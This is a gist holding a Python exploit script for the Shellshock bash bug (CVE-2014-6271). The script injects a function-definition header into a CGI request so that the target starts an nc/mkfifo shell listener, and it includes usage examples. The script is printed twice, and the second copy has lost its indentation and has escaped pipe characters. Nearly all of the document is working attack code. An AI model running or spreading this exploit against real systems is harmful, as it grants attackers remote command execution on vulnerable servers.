nlamirault · August 29, 2015 14:06
diff --git a/gistfile1.py b/gistfile1.py
 #!/usr/bin/python
 #
 # CVE-2014-6271 cgi-bin reverse shell
 #
 # Ex:
 # $ ./shellshock.py 10.1.1.44 /cgi-bin/hello.cgi 10.2.2.44 2222
 # $ nc 10.1.1.44 2222
 #
 
 
 import httplib
 import sys
 
 
 if (len(sys.argv) < 4):
    print("Usage: %s <host> <vulnerable CGI> <attackhost> <IP>" %
          sys.argv[0])
    print("Example: "
          "%s ./shellshock.py 10.2.2.45 /cgi-bin/hello.cgi 10.3.3.46 3333" %
          sys.argv[0])
    exit(0)
 
 conn = httplib.HTTPConnection(sys.argv[1])
 reverse_shell = ("() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; "
                 "/usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 "
                 "| nc -l %s %s > /tmp/f'" %
                 (sys.argv[1], sys.argv[4]))
 
 headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
 print("Call %s %s" % (sys.argv[1], sys.argv[2]))
 conn.request("GET", sys.argv[2], headers=headers)
 res = conn.getresponse()
 print(res.status, res.reason)
 data = res.read()
 print(data)
	#!/usr/bin/python
	#
	# CVE-2014-6271 cgi-bin reverse shell
	#
	# Ex:
	# $ ./shellshock.py 10.1.1.44 /cgi-bin/hello.cgi 10.2.2.44 2222
	# $ nc 10.1.1.44 2222
	#


	import httplib
	import sys


	if (len(sys.argv) < 4):
	print("Usage: %s <host> <vulnerable CGI> <attackhost> <IP>" %
	sys.argv[0])
	print("Example: "
	"%s ./shellshock.py 10.2.2.45 /cgi-bin/hello.cgi 10.3.3.46 3333" %
	sys.argv[0])
	exit(0)

	conn = httplib.HTTPConnection(sys.argv[1])
	reverse_shell = ("() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; "
	"/usr/bin/mkfifo /tmp/f;cat /tmp/f \| /bin/sh -i 2>&1 "
	"\| nc -l %s %s > /tmp/f'" %
	(sys.argv[1], sys.argv[4]))

	headers = {"Content-type": "application/x-www-form-urlencoded",
	"test": reverse_shell}
	print("Call %s %s" % (sys.argv[1], sys.argv[2]))
	conn.request("GET", sys.argv[2], headers=headers)
	res = conn.getresponse()
	print(res.status, res.reason)
	data = res.read()
	print(data)